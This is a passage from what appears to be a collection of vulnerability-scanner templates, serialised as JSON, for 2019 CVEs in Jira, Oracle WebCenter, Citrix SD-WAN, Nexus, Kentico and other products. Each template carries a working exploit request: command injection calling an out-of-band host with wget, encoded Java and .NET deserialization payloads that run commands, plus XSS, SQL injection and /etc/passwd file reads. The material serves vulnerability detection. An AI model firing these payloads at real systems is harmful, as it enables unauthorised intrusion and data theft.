<param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: 